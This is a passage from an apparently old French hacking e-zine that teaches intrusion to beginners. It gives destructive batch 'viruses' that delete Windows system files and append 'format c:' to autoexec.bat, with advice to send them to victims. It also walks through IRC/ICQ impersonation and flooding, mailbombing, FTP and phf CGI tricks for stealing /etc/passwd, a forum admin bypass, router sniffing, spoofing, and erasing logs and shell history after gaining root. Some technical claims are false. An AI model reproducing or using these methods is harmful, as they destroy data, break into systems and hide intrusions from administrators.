Bon, avoir un virus c'est bien mais il faut savoir le maquiller et l'envoyer au plus grand nombre de personnes, et cela de manire anonyme. Pour ce qui est de l'anonymat, je ne matrise pas du tout et je ne suis jamais parvenu  envoyer un virus en tant completement anonyme. D'o l'interet d'envoyer des virus totalement destructeurs plutt que des virus certes chiants mais pas fatals, qui permettront  l'utilisteur de pouvoir noter votre adresse e-mail... Au moins, quand le disque dur de votre victime est compltement niqu, y'a peu de chances qu'on vous retrouve. Mais parait qu'on peut envoyer des virus par mailbomber, a non plus j'ai jamais essay. N'tant pas un expert en virussologie, je vous propose quand mme de programmer vos propres virus, sans passer par l'assembleur, tout simplement avec word pad... Aprs la cration du virus, on le renommera en .bat pour qu'il puisse fonctionner. Je vous prviens  l'avance, les virus en .bat, je sais les programmer mais appliquer ce que je sais NON. Trop dangeureux, alors si votre pc est lui mme infect par le virus, n'allez pas me menacer en disant que c'est de ma faute. Je ne serai en aucun cas responsable, allez donc voir le disclaimer... Les virus en .bat sont interessants car aucun anti-virus ne semble pouvoir les detecter...  La cration d'un virus en .bat est trs simple, suffit juste de connatre un peu ms-dos. Quelques commandes:

echo off : desactive l'affichage de ce qui se passe
echo on : active l'affichage
echo. : saute une ligne.
echo bonjour : affiche ce qui est crit aprs echo (ici, bonjour).
del :  votre avis???  :o
copy : copier un fichier vers un repertoire.
deltree : demander votre avis avant de supprimer.
if .... : commande de condition.
cd : se deplacer dans un autre repertoire
valeur1/variable1 = valeur2/%variable2% : attribue une valeur/variable  une autre valeur/variable.
dir c:/windows : affiche tout le contenu d'un repertoire (ici, windows).
cls : efface l'cran.
attrib : sert  mettre des attributs sur les fichiers, exemple: attrib +r +h c:\test.txt va mettre le fichier test.txt en attribut invisible et inmodifiable.
pause : demande d'appuyer sur une touche pour continuer.
start : demande d'executer un fichier.
rem : insrer une remarque.
commande>nul : executer une commande silencieusement.

Voil donc un de ces virus trs dangeureux que vous pouvez faire:

>echo off
>echo bonjour
>echo je suis un virus, programm par [Kefka]
>echo c'est quoi windows/system?
>echo ca m'a l'air d'tre dangeureux
>echo je m'en occupe
>pause
>del C:/windows/system/*.*
>echo voil, c'est effac, t'auras plus de problmes mouarf
>echo adieu!!!

Mouarf, vous voyez quoi, ensuite vous enregistrez le fichier word, vous le renommez en .bat et si vous tes tendance crasher, vous l'executer... :-)
Aprs vous rajouter dans autoexec.bat la ligne de commande c:/votrevirus.bat pour qu'il puisse s'executer au dmarrage du pc...
On peut aussi crer des virus proposant plusieurs choix, avec un menu d'option, du genre:

>@echo off
>copy c:\windows\bureau\mitnick.bat c:\mitnick.bat
>Attrib +r c:\mitnick.bat
>Attrib +h c:\mitnick.bat
>del c:\windows\bureau\mitnick.bat
>REM  ---This programm has been coded by [Kefka]
>REM             *** All right reserved***
>echo format c:>nul>>c:\autoexec.bat
>cls
>:menu
>echo 1. editer un fichier
>echo 2. lancer un scan
>echo Q. Quitter
>choice /c:12Q/t:Q,60/n Votre choix?
>if errorlevel 255 goto erreur
>if errorlevel 3 goto Quitter
>if errorlevel 2 goto startscan
>if errorlevel 1 goto editfile
>if errorlevel 0 goto erreur
>
>:erreur
>echo il y'a eu une erreur
>pause
>start c:\rundll32.exe user.exe,exitwindows
>
>:Quitter
>echo aurevoir
>goto erreur
>
>:startscan
>start scandisk
>goto erreur
>
>:editfile
>edit
>goto erreur
>
>@echo on 

Cool n'est ce pas? Laissez libre cours  votre imagination, mais faites gaffe quand mme :-) . ( partir de ce modle, je pense que vous n'aurez pas trop de problmes  faire votre virus perso). Pour compiler vos crations, telecharger Power Batch. Voil qui va clore ce chapitre sur la programmation de virus en .bat, ma fois trs interessant. N'en abusez pas trop, a peut tre dangeureux arf.




9/Hack sous IRC/ICQ

Bon, on va s'loigner un peu de la programmation avec un article pour les newbies de chez newbies lol. On va commencer par ICQ, ca sera plus simple. Donc, vous avez votre client ICQ, y'a un keum qui vous fait chier et vous voudriez bien usurper de son pseudo pour passer pour un con devant sa copine (s'il en a une ....). C'est trs simple: Faites:

>ICQ
>Add/Change current user
>Register a New User(ICQ#)
Entrez donc toutes les informations concernant votre victime.Puis:
>Change the Active User
Et le tour est jou! Seul votre numro ICQ diffre alors faites quand mme gaffe... 
Bon, sinon je pourrais vous expliquer l'ip spoofing sous ICQ mais je prefere vous l'expliquer un peu plus loin, sinon on va croire que je me rpte...
Sous IRC, maintenant, c'est dj plus facile. Supposons que vous soyez connects sur irc.jeuxvideo.com . Allez sur le site de www.jeuxvideo.com et rentrez dans le dialogue en direct. Vous serez connects sous deux identits diffrentes! De plus, vous pouvez  l'aide de votre client IRC, et sur irc.jeuxvideo.com, vous connecter avec des pseudos dj reservs, ou avec des pseudos qui se rapprochent des vrais (quelle est la diffrence entre hack-man et hack-rnan selon vous? :-o ).
Un truc chouette, avec les clients IRC, c'est le flood. Le flood consiste  envoyer un message, repet ou non, sur un chat afin d'empecher les autres utilisateurs de chatter (du moins c'est ma version des faits lol). Les copier-coller conservent leur integralit! Selectionnez et copier le contenu de ce zine par exemple. Ouvrez votre client IRC, allez sur irc.jeuxvideo.com (mouarf dcidment c'est ma cible prfre) et faites un coller avec ctrl+v... Effet garanti!!! arf...
Bon je pourrais vous passer en revue les diffrentes commandes possibles sur irc, mais vous pouvez dj les avoir avec un ptit /msg chanserv help, ou /msg nickserv help .
Alors bon chat !!!




10/Architecture Linux (Unix)

Linux est un systeme d'exploitation qui a t cre en 1976, O.S trs important puisque le rseau internet est entirement constitu de machines linux. Linux est galement un O.S trs pratique pour hacker, bien que pas franchement indispensable, il n'en est pas moins important. Mais il prsente un trs grand problme: la scurit , arf...
Unix (ou linux c'est la mme chose) est un systme multi-utilisateurs, dont les utilisateurs ont plus ou moins de droits. Le plus interessant est le root, car il possde tous les droits. Quand vous penetrerez un systme unix, vous tomberez sur plusieurs dossiers, sous dossiers, communs  toutes les machines tournant sous linux. Voil un shma illustrant le systme de fichiers sur une architecure linux:
 
|--/unix
       |
       |--/etc|--/passwd
       |      |--/bin
       |      |--/group
       |      |--/profile
       |      |--/utmp
Systeme|      |--/conf
UNiX --|      |--/motd
en     |     etc...
general|
       |--/dev              |--/duke3d
       |                    |
       |--/tmp     |--/jeu|--/command&conquer
       |           |
       |--/lib     |--/annuaire
       |           |
       |--/usr|--/X|--/mail
       |      |    |        
       |      |    |--/bin    |--/celullaire
       |      |    |          |
       |      |    |--/travail|--/plan-telephonique
       |      |    
       |      |    
       |      |--/Y|--/travail
       |      |    |
       |      |    |--/mail
       |      |
       |      |-etc....
       |
       |--/bin
       | 
      --/root ou /

Voil maintenant une petite description du contenu de ces rperoires:

/etc: se trouve a la racine du serveur ,il contient toute la configuration du systme. Il y a dans ce dossier les fichiers dfinissant les droits des utilisateurs , la configuration du dns ,les partitions qui doivent tre montes ,la liste des machines avec les quelles on s'autorise  converser. Si le dossier se trouve autre par qu' la racine du disque, cela veut juste dire qu'il concerne les fichiers de paramtrage de la zone du dossier dans le quel etc se trouve. Tous les fichiers magiques reprsentant les diffrents types de hardware qui sont installs dans le serveur.Sous unix,la majorit des objets manipulable sont des fichiers. Ce rp permet de voir et de faire beaucoup de chose:exemple "voir"passer les paquets tcp/ip,ou parler au modem ou d'crir sur le disque.Ce sont des programmes qui gre tout cela,car si non se serais vachement difficile./bin et /sbin : le "s" devant bin veut dire qu'il s'agit de la version super user. Ce rpertoire contient tout les binaires (dout son nom) qui servent  manipuler les diffrentes fonctionnalits du systme. Il ne faut pas y toucher sous peine de tout foutre en l'air donc les crashers savent se qu'il doive supprim. La suppression de ce fichier entranerais que le systme unix deviendrais imbootable. Encore une fois, on trouve ces dossier un peu partout sur le systme unix, cela veut juste dire qu'il concerne la zone en question:/user/sbin reprsente une partie des codes binaires du super admin (si non il y aurais pas le "s"). Mais vous me direz c'est pas bin pour les user: car sans cette partie de code binaire du super user, le usr ne pourrais pas ce servir du serveur./usr: c'est la ou se trouve tous les progs que vous avez installez mais ce rpertoire concerne plus linux donc je ne m'attarderais pas sur ce sujet./var: cette  cette endroit que l'on aura toute la partie variable du systme.On y trouve tous les rp suivant: log, spool, lock. Dans log , c'est la que tout ce que vous faites sur le serveur est logg dout son nom "log", donc fichier a supprim si vous le pouvez. Dans /var/spool: on trouve tous les fichiers en attendes de transfert , d'impression. Vous pouvez aussi trouvez les emails en attende de transfert. Donc pour les hackers c'est le top, profiter des ngligences de l'admin ou de sa mconnaissance ,peut tre a t ' il oubli de mettre un accs restreint a ce rpertoire./tmp: Tous les fichiers qui sont susceptibles d' tre effacs par le systme ou par l'admin. On y trouve un peu de tout. Vous pouvez trouver un fichier passwd en cours d'utilisation ou de traitement. Ou encore des fichiers dcods. Donc c'est aussi un endroit a retenir./mnt: Le plus souvent ,on n'y trouve tous les lecteurs disquettes et cd rom. On peux aussi avoir accs a un disque dur d'une machine du rseau local du serveur, et les droits d'accs  ces disques durs peuvent tre nglig. Donc aussi un rp a pas oublier./lib:  Un endroit stratgique ,le droit d'criture est toujours rserv au super user. On y trouve des codes binaires parfois prl et tcl. Cette endroit est bien protg parce que il suffit d'imaginer ce qu'il se passerait si quelqu'un tait en mesure de remplacer une librairie trs commune et anodine par une autre ayant exactement les memes fonctionnalits mais qui, en plus contiendrait un cheval de Troie... 

Etudions maintenant les principales commandes  effectuer sur un serveur, sous DOS.

ls : cette commande vous permet d'avoir plus d'informations sur un repertoire ou un fichier
exemple:

>ls etc
>d rwxr-x---   root   skipass   10000   05/02/02   18:50   passwd
>d rwxr-x---   root   skipass   12000   05/02/02   18:51   group
> 1   2              3         4            5            6            7          8

Et voil  quoi correspondent ces differentes parties:

1 : le type de fichier : il en existe trois : 
-les repertoires
-les fichiers ordinaires (textes, courriers, source de programmes,.exe,etc.)
-les fichiers speciaux (pour la gestion du systeme, donc interressant)
2 : le bit de droit d'acces: il se divise en trois partie de trois caracteres (il y'a neuf caractres)
La premier partie concerne le propio du file (u)
La deuxieme partie concerne le groupe du proprio (g)(avec lequel il travaille)
La troisieme concerne un utilisateur externe au groupe.(o)
Dans les trois cas il existe trois droit d'acces qui sont designe par trois
lettre respective :
r : droit de lecture (Read)
w : droit d'ecriture (Writte)
x : droit d'execution (eXecute)
le - indique qu'il n'y a aucun droit accorde
3 : le proprio du file
4 : le groupe auquel le proprio appartient ou travaille
5 : memoire en ko
6 : la date de la derniere lecture
7 : l'heure de la derniere lecture
8 : le nom du fichier

cat: cette commande vous permet de lire les fichiers txt, si vous en avez la permission naturelement.     ;-)

cd: cette commande vous permet de changer de repertoire.

get: cette commande permet de rcuperer un fichier

mget: cette commande permet de rcuperer le contenu d'un rpertoire

cp: cette commande vous permet de copier un fichier.

del: cette commande vous permet de supprimer un fichier.

rmdir: cette commande vous permet de supprimer un rpertoire.

mkdir: cette commande vous permet de crer un rpertoire.

get: cette commande vous permet de transfrer un fichier du serveur jusqu' votre bureau

pwd: cette commande vous permet de savoir dans quel rpertoire vous tes.

dir: cette commande vous permet d'accder au contenu d'un rpertoire.

put: cette commande vous permet d'envoyez un fichier au serveur.

mput: cette commande vous permet d'envoyez une liste de fichiers au serveur.

cd/: cette commande vous permet d'aller  la racine du serveur.

cd..: cette commande vous permet de retourner au repertoire parent.

disconnect: cette commande vous permet de vous dconnecter du serveur sans quitter votre fentre ms-dos.

who: cette commande vous permet de savoir quels sont les utilisateurs connects.

write: cette commande vous permet de "chatter" avec un des utilisateurs connects.

Voil, c'est a peu prs tout ce qu'il faut savoir  propos d'Unix. Cela vous suffira amplement quand vous tenterez d'attaquer un site quelconque...
A propos de hack de site, justement nous y voil     :-))




11/Piratage d'un site: introduction

Bon, vous allez me dire que vous le savez dj, mais je vous le redis, le piratage est svrement puni... Alors, si vous arriver  avoir accs aux donnes d'un site, ne faites pas le con, au maximum vous modifiez la page d'accueil du site mais c'est tout! Pas de crash, je vous fais confiance... Surtout si vous vous attaquer  un provider ou  un site d'tat, l vous tes vraiment dans la merde... Vous serez vite tracs et vite repers, soit vous aurez un avertissement trs svre ou bien vous aurez le droit  une sanction juridique! (et l ca ne rigole pas, voir chapitre 27) .
Je vous rapelle pour mmoire que je ne serais en aucun cas responsable de ce que vous pourrez faire avec ces informations. C'tait juste histoire de remettre les point sur les i...
Bon, si vous voulez vous attaquer  un site, il vous faudra d'abord rassembler le maximum d'informations sur lui. Un trs bon outil est fait pour a il s'agit de WSpingProPack, disponible entre autre sur http://www.ipswitch.com . N'hsitez pas  rassembler vos informations sur un bloc-notes afin de pouvoir les avoir  votre porte, en cas de necessit!

Voil donc un petit listing du matriel que vous devez avoir avant de commencer un hack:
-WsPingProPack, ou si vous ne l'avez pas utiliser des comandes DOS pour parvenir  vos fins (tracert www.nomdusite.com ; ping -A www.nomdusite.com ).
-Un bon crackpass (VcrackFTP devrait convenir).
-Un decrypteur pour Unix (genre Jack The Cracker).
-Un client FTP genre Ftp explorer
-Une lgre conaissance de Linux.
-Une feuille avec toutes les informations sur le site.
-Un sniffer (pas dans tous les cas)
-Une bonne notion des exploits et de la programmation (pas dans tous les cas)
-Une mitraillette MP5, pour vous proteger si les flics dbarquent chez vous, arf non je deconne...     :))
-Une conscience...

Vous avez tout le matos? Oki c'est parti mon kiki           :-D




12/Piratage d'un site: hack par ftp


Nous allons plus particulirement nous interesser  deux cas de figures. L'un dans le cas d'un serveur peu proteg, l'autre dans le cas d'un serveur mieux proteg. On commence...

Dans le cas d'un serveur peu proteg: 
Prenons comme exemple le site de skipass.com. Avec WSPINGPROPACK, on rcupere les noms des contacts (dans l'onglet "infos") :
 "Administrative Contact, Technical Contact, Billing Contact:Sellimoutou, Marina  (MS4651) noc@VERIO.FR
VERIO FRANCE". 
Alors, on constate deux noms d'users, Sellimoutou et Marina. Ouvrez donc votre client FTP entrez l'adresse du site et dans profile name et login entrez le nom d'un de ces utilisateurs avec comme mot de passe l'adresse noc@VERIO.FR (le plus souvent le mot de passe sera une adresse e-mail si le serveur est mal configur bien entendu) . Et si cela ne marche pas (c'est le cas ici) sortez VcrackFTP et testez toutes les Wordlist que vous pourrez... Bon courage !!!

Dans le cas d'un serveur mieux proteg:
Allez sous DOS et tapez:
>ftp
>open www.nomdusite.com
>quote user ftp
>quote cwd ~root
>quote pass ftp 
Cet exploit vous donnera soit l'accs root (le root est l'utilisateur qui a le plus de droits sur un systeme unix), ou soit un accs anonyme sur le serveur. Comme cela sera trs certainement le cas, restez sous DOS et tentez de rcuper le fichier passwd. Tapez:
>get etc/passwd
Le repertoire dans lequel est plac ce fichier varie selon l'O.S (systeme d'exploitation) du serveur. Voici donc une liste de ces rpertoires:

Os   >   Rpertoire dans lequel passwd est cach
-----------------------------------------------------------------
AIX3 > etc/security/passwords
A/UX 3.Os > tcb/files/auth
BSD4.3-Reno > etc/master/passwd
ConverOs 10 > etc/shadow
DG/UX > etc/tcb/aa/user
EP/IX > etc/shadow
HP-UX > secure/etc/passwd
IRIX 5 > etc/shadow
Linux 1.1 > etc/shadow
SCO Unix#.2.x > tcb/auth files/r/root
SunOs 4.1+c2 > etc/security/passwd/adjunct
SunOs 5.0 > etc/shadow
System V 4.0 > etc/shadow
System V 4.2 > etc/security
Ultrix 4 > etc/auth/[.dir|.pag]
UNICOS > etc/udb

Hem, hem, ba voil... Ne croyez cependant pas que le tour est jou. Le fichier passwd atterira sur votre bureau. L, il y'a 2 possibilits, soit le fichier est crypt, soit il est en shadow. Si il est crypt, vous aurez un truc du genre "root: 1fd5s1: 0: 1: Superuser" , prenez donc Jack The Cracker ou tout autre decrypteur de pass Unix, et attendez... Patience  :))
S'il est en shadow (en toile), ce qui nous donne quelque chose comme "root:x:0:1:Superuser", cela veut dire que le vrai fichier passwd se trouve dans un autre rpertoire, qui varie donc selon l'O.S, vous avez compris... :)
Quand vous aurez les pass, utilisez comme login le nom d'un des users, comme on a vu tout  l'heure. (ou alors mettez comme login: root)
Si l'accs anonyme ne vous est pas autoris, cherchez d'autres failles possibles  exploiter... Et passez donc  la suite.    :-)
 



13/Piratage d'un site: exploiter les failles Wingate

Certains serveurs tournant sous Windows NT prsentent des failles trs interessantes pour les hackerz...Le port de Wingate est le 8010. Essayez donc de taper sur votre navigateur ceci:
>http://www.urlNT.com:8010/c:/
Cette faille peut vous permettre de vous faire passer pour un ordinateur connect au rseau et donc d'avoir accs  tous les dossiers du serveur... Trs cool. Sinon, essayez par Telnet, entrez comme adresse:
>wingate>www.url.com
Soit vous aurez directement accs au contenu des ordinateurs, soit le serveur vous demandera un login et un mot de passe. Reportez vous donc au chapitre Hack par Telnet pour passer cette protection    :p




14/Piratage d'un site: exploiter les failles CGI

Certains serveurs vous permettent d'accder au fichier passwd directement dans la barre d'url en tapant
>www.nomdusite.com/etc/passwd
Cela ne marche que trs rarement, mais vous pouvez aussi tenter d'autres adresses, si le site utilise le php:
>http://www.nomdusite.com/cgi-bin/php.cgi?/etc/passwd
Ou si le site utilise le  phf:
>http://www.nomdusite.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Mais nous allons plutt nous procupper des faiblesses php, qui nous permettront de rcupere les passwd de l'administrateur d'un forum d'un site qui utilise le php.
Donc nous avons un site quelconque, qui possde un forum en php3. Tentez pour commencer d'accder aux stats du sites:
>http://www.nomdusite.com/stats
Si l'accs n'est pas proteg, c'est du gateau, allez sur les stats ftp:
>http://www.nomdusite.com/stats/ftp
Vous obtiendrez alors les url de certain fichiers, censs tre cachs, dont certains ont une importance. Essayez d'accder  ces fichiers, et cherchez le mot de passe de l'administrateur du forum, plac dans le fichier config.txt. Il vous faut mainteant vous logger en tant qu'administrateur. Sur la page d'accueil du forum, vous notez l'adresse, http://www.nomdusite.com/forum/index.php3. Chaque message contient un numro et la lecture fonctionne comme ceci: message.php3?num=21. Il y'a donc une variable num. Nous allons maintenant chercher la variable d'administration, essayez donc :
>http://www.nomdusite.com/forum/index.php3?admin=passwd
Vous serez donc logg en tant qu'admin. Cette faille est assez rare mais vaut vraiment qu'on essaye de l'exploiter. De plus, il arrive que le mot de passe de l'admin du forum soit le mme que celui du site.   ;-)
Bonne chance !!!




15/Piratage d'un site: hack par Telnet

Conditions ncessaires:
-Que vous ayez Telnet
-Que vous ayez un bon cracker de mot de passe
-Que vous ayez beaucoup de chance   :op

Certains sites disposent d'un accs Telnet. Si Telnet est mal configur vous pouvez facilement accder au contenu du serveur d'un site.
Ouvrez donc Telnet, Dmarrer/Executer et tapez telnet.exe.
Mettez le nom du site dans nom d'hte, laissez le port Telnet et connectez vous. Si tout se passe bien, vous aurez accs au serveur, et on vous demandera un login et un mot de passe. Si le serveur est mal configur, vous n'aurez pas besoin de mot de passe. Mettez donc come login le nom du site ou le nom d'un de ses webmasters (rcupers avec WsPingProPack). Si le serveur rclame un mot de passe, utilisez un bon cracker de mot de passe et ayez beaucoup de patience...
Utilisez la commande "help" pour avoir la liste des commandes possibles.
Voil !!!            :))




16/Piratage d'un site: comment s'attaquer  un routeur

Conditions ncessaires:
-Que vous ayez Telnet
-Que vous ayez WsPingProPack
-Que vous ayez un bon sniffer
-Que vous fassiez trs attention...

Rappelons tout d'abord la dfinition d'un routeur: Un routeur est un disposiif matriel qui permet d'envoyer et de reevoir des donnes depuis un rseau. L'intret de s'attaquer un routeur, c'est qu'en devenant routeur, on peut ainsi changer l'adressage du rseau et intercepter des informations top-secretes... Mais bon fantasmez pas trop l...    :p
Pour trouver l'adresse IP d'un routeur afin de pouvoir s'y connecter, il faut dj connaitre l'adresse IP du rseau. Bon alors on au site dont l'ip est: 45.12.38.20  (je dis n'importe quoi l mais c'est qu'un exemple) . Alors tout ce qui nous interesse dans cette ip, vous l'aurez compris, c'est l'adresse du rseau, 42.12.38 .
Sortez donc WsPingProPack, on va scanner tout ce qui est sur le rseau. Lancez donc un scan sur SNMP, on obtient donc une liste d'adresse IP, celles des routeurs miam miam...
Connectez vous donc au routeur par Telnet. Pour le login, prenez les noms des webmasters du site et pour les passwords, prenez votre sniffer et attendez que quelq'un se logue sur le routeur... Surtout faites TRS attention, chaque connection est enregistre avec votre IP. Donc mettez en oeuvre diffrentes techniques de spoofing pour pas qu'on vous repre. Sinon, vous allez passer une bonne partie de votre vie  dormir  prison...                 ;-((




17/Piratage d'un site: approche de script kiddie

La question qui vous mord les lvres: Qu'est ce qu'un script kiddie? On dsigne par ce terme les pirates qui s'introduisent sur un serveur, au moyen d'exploits, visant  acqurir l'accs root, (NDLR: le plus souvent en langage C) sans en connatre la signification. Devenir sk (abrviation de script kiddie  :-o)) est une chose trs interessante pour les newbies car cela ncessite trs peu de conaissances. 
Comment donc procder pour attaquer un serveur, en tant script kiddie?
La premire tape consiste  trouver l'O.S du serveur. Ouvrez une fentre DOS et tapez :
>ftp
>open www.nomdusite.com     (ok je sais c'est du dj vu mais bon...)
Dans la plupart des cas le serveur se prsentera  vous, sinon trouvez une autre mthode. (linux est trs utile pour trouver un O.S.)
La seconde tape consiste  chercher des exploits, exploitant les faiblesses du serveur. Ces exploits varie donc selon son O.S. Vous en trouverez plein sur le net avec ftpsearch. Vous pouvez galement aller sur http://www.rootshell.com y'en a plein l bas aussi.
La dernire tape est de compiler cet exploit sur le serveur afin de devenir root (le plus souvent les exploits servent  a). Il vous faudra donc d'abord crer un compte sur le serveur puis y placer votre exploit pour ensuite le compiler sur le serveur et enfin l'executer. Puis aprs, vous tes le master du systeme, pas besoin que je vous dise les differents trucs que vous pouvez faire en tant root, les ides viendront bien toutes seules :))

Bon, c'est cool tout a, mais qu'est ce que ca fait de plus un vrai hacker? Simple, il fait tout ce que les sk ne font pas, c'est  dire dtecter les failles du serveur et utilisez des exploits cres par eux mmes, ou alors simplement les comprendre, les matriser (je sais c'est dur...)
Certes, on arrive au mme rsultat, mais un sk se soucie gure des programmes qu'il utilise.
La seule diffrence entre le sk et le vrai hacker est le niveau de programmation... :p
Ca peut paratre trs chiant mais sans la programmation, vous ne serez jamais un grand hacker... (voir chapitre 21)

NB: Avoir un root sur un systeme c'est chouette mais il va falloir faire un backdoor (traduction: porte de derrire) pour pouvoir cacher votre root et pour revenir sur le serveur quand vous voulez. (voir chapitre 20)  




18/Comment cacher son identit sur le net: les mails anonymes

L vous avez deux solutions : - avec un mailbomber
                                             - avec Telnet

Ces deux mthodes ne fonctionnent que sur des serveurs du type mail.domaine.com   (par exemple mail.hotmail.com).
Bon, commenons par le mailbomber. Je vous conseille de prendre le mailbomber de Socket23, qui est un trojan. Ouvrez le et dans "serveur de la messagerie" mettez mail.domaine.com puis indiquez l'email de la victime. Mettez ensuite votre adresse mail (une fausse bien entendue :p) et indiquez le nombre de messages  envoyer (NDLR:il n'y a pas de limites...) et connectez vous. Simple et efficace ...  :))

Maintenant pour ceux qui veulent faire plus compliqu vous pouvez aussi en envoyer par Telnet. Ouvrez donc Telnet indiquez le serveur de la messagerie, mail.domaine.com, entrez le port 23 et connectez vous. Puis tapez : (NB: ce que vous tapez n'apparat pas  l'cran)
>helo mail.domaine.com
Ceci devrait prsever votre anonymat. (certains serveurs n'acceptent pas cette commande). Tapez maintanant
>mail from: n'importequi@n'importequoi.com    (votre fausse email)
>rcpt to: victime@domaine.com    (indiquez l l'adresse de votre victime)
>data
Puis tapez votre message, sans oublier de mettre un point  la fin.
Voil !!!

Si vous voulez pas vous prendre la tte avec ces mthodes, telechargez anonymizer, c'est plus sr et plus efficace.    :))





19/Comment cacher son identit sur le net: le spoofing

Le spoofing sert  cacher son adresse IP sur Internet, en en prenant une autre. C'est plus facile  dire qu' faire... Etudions les diffrentes techniques de spoofing:

Le spoofing sous IRC: Imaginez que le nick (pseudo) du mec soit "Assassin" et que l'ip que vous ayez trouv de lui soit 152.194.56.132.                                                       Etant donn qu'un scanner scanne toujours les ip de 0  255 et toujours en ordre croissant on va rentrer dans le scanner les ip suivantes: 152.194.56.0 et 152.194.56.255. On choisit un port, le 23, celui du telnet. Et on lance la recherche. Il va nous sortir plusieurs ip (esprons). S'il n'en sort pas, on fait un /dns sur un autre nick et ainsi de suite jusqu' trouver des ip mais normalement pas de problmes. Les ip qui apparatront sont les ip de machines ayant le port choisi (ici le 23) ouvert. Imaginez que plusieurs ip sortent dont celle ci: 152.194.56.13 
Maintenant vous allez taper l'instruction suivante sur irc: /serveur ip_du_mec port_tenet Dans notre exemple:
> /server 152.194.56.13 23 
Mirc va alors vous crire les commandes suivantes: >*** Disconnected                                                                                    
>*** Connecting to 152.194.56.13 (23)                                                     
>Local host: rhylmachine (152.172.127.204)                                               
> WinGate>NICK endrix >Connecting to host NICK...Host name lookup for 'NICK' failed >USER RhylKim "rhylmachine" "152.194.56.13" nono lpti robo >Connecting to host USER RhylKim "rhylmachine"152.194.56.13" ...Host name lookup for ' USER >RhylKim                                                                                                                                                                                                                                                                                                                                                                                           "rhylmachine" "152.194.56.13" ' failed 
Une fois votre ip spoofe auprs d'irc il va falloir vous reconnecter car la prcdente manip vous a dconnect. et pour a vous allez faire: /raw nom_du_serveur port_irc 
Dans notre exemple:
> /raw irc01.irc.aol.com 6667 
Mirc va alors vous crire les commandes suivantes: >aol.com rg "rhylmachine" "152.194.56.13" ...Host name lookup for ' >USER >RhylKim "rhylmachine" "152.194.56.13" ' failed >Connecting to host irc01.irc.aol.com ...Connected 
Maintenant les formalits: votre nick: /nick votre_nick Dans notre exemple: /nick RhylKim 
puis: >/user ident x x full_name Dans notre exemple:
> /user nono lpti robo x x rhylmachine 
Voil c'est bon votre adresse ip est spoofe sur mirc. Si quelqu'un fait un /dns ou un whois sur vous, c'est l'adresse ip spoofe qu'il verra et non le vtre. Les modros ne pourront donc plus vous bannir, libre  vous de faire ce que bon vous semble

Le spoofing sous ICQ:
Il existe de nombreux programmes pour spoofer son IP sur ICQ. Cependant, il existe une mthode simple, bien qu'elle ne marche pas  tous les coups. Pour commencer, prenez l'IP de quelqu'un, ouvrez ICQ, puis allez dans "prferences", "serveur" et changez le serveur qui est not par icq.mirabilis.com et laissez icq1.mirabilis.com.
Aprs a reconnectez vous sur ICQ allez dans "security privacy" et enlevez le "do not IP publish". Vous serez ensuite spoof...   :))

L'IP spoofing:                                                                                               Bon, l, c'est dj plus compliqu...La mascarade d'adresse IP ou  ip spoofing permet a une machine du rseau extrieur de se faire passer pour une machine du rseau intrieur et ainsi de profiter de tous ses droits. L'attaquant donne a son ordinateur l'adresse IP d'une machine appartenant au rseau interne.
Donc, si vous voulez vous attaquez  un ordi dans un rseau protg par un firewall, vous allez devoir envoyez un paquet d'ip contenant une adresse IP d'un des postes du rseau. Le firewall va donc laisser passer le paquet ip car il reconnatra une adresse appartenant au rseau !!! Pour que vous puissiez tre spoof sur un rseau, va falloir crer sur le serveur un fichier *.rhost, je parlerais peut tre des fichiers rhost dans un autre e-zine, patience...
Bon voil, vous pourrez galement trouver en tlechargement sur le net des programmes permettant de vous spoofer, mais galement des blooffers, des brouilleurs d'ip. Cependant ces derniers sont trs facile  dtourner, et pas franchement efficaces. Optez donc plutt pour le spoofing.   :-)



20/Comment cacher son identit sur le net: l'aprs root

Prenons une situation simple. Vous venez d'obtenir l'accs root sur un serveur quelconque, et cet accs, si durement acquis, vous aimeriez bien le garder afin que vous puissiez revenir quand bon vous semble, et cela sans que personne s'en aperoive... 
Regardons donc la dmarche  suivre, sous Linux:
La premire chose que vous aurez  faire une fois votre shell root obtenu, c'est de modifier tous les logs du serveur qui pourraient aider l'administrateur  vous retrouver. Il existe trois types de logs, les syslogs, qui notent les messages envoys au root par le systeme, le lastlog, et les historiques.

Commenons par les syslogs: Pour effacer vos traces dans le systeme, faites (ou nom_de_domaine, adresse_ip et nom doivent tre remplacs par les donnes du serveur)
>sh-2.05$ cat /etc/syslog.conf
>sh-2.05$ cat log | grep -v nom_de_domaine | grep -v adresse_ip > nom
>sh-2.05$ cat nom > log
>sh-2.05$ rm nom

Voil, nos traces sont effaces. On va maintenant rediriger les logs dans un endroit ou personne ne pourra les retrouver. D'abord, noter la date et l'heure du dernier changement de syslog.conf:
>sh-2.05$ cp/syslog.conf nom
>sh-2.05$ emacs syslog.conf

Ensuite on va tout rediriger dans /dev/null. Puis:
>sh-2.05$ killall -HUP syslogd

Maintenant on remet tout en place:
>sh-2.05$ mv nom syslog.conf
>sh-2.05$ touch -t yyyymmddhhmm.ss syslog.conf.
Et voil. Ca, c'tait pour les syslogs, maintenant:

Occupons nous du lastlog. Ce log enregistre la dernire connection de chaque utilisateur avec le port et l'adresse depuis lesquels il s'est connect. Notre travail va consister  se relogger sur sa machine afin de faire disparatre la connection locale. Pour cela, faites:
>bash-2.05# rlogin root@localhost
Voil c'est tout, pas trop dur mouarf... Maintenant:

On va s'occuper des historiques. Ces fichiers enregistrent toutes les actions que vous commandez avec votre minable shell root... Chaque shell possde un fichier d'historiques dans le rpertoire de son utilisateur:
- sh: .sh_history
- csh: .history
- ksh: .sh_history
- bash: .bash_history
- zsh: .history
- tcsh: .history

Vous allez donc devoir en premier lieu, changer de shell pour effacer l'historique du shell prcedent. Dans pratiquement tous les cas, votre shell sera sh. 
Maintenant regardons si le fichier .tcshrc existe, si oui, notons l'heure de sa dernire modification, puis faisons:
>sh-2.05$ mv .tcshrc.nom
>sh-2.05$ echo "set histfile=/dev/null" > .tcshrc
>sh-2.05$ tcsh

L'historique sera donc redirige vers /dev/null. Il ne reste plus qu' effacer du fichier .sh_history toutes les actions que l'on a faites depuis le dbut.
Puis, juste avant de partir, faites la manipulation inverse:
>root@hacked~>mv.nom.tcshrc (ou rm.tcshrc si vous venez de le crer)
>root@hacked~>touch -t yyyymmddhhmm.ss .tcshrc avec l'heure  laquelle il a t cre
>root@hacked~>logout
Voil dsormais, toutes les traces de votre passage sont effaces.

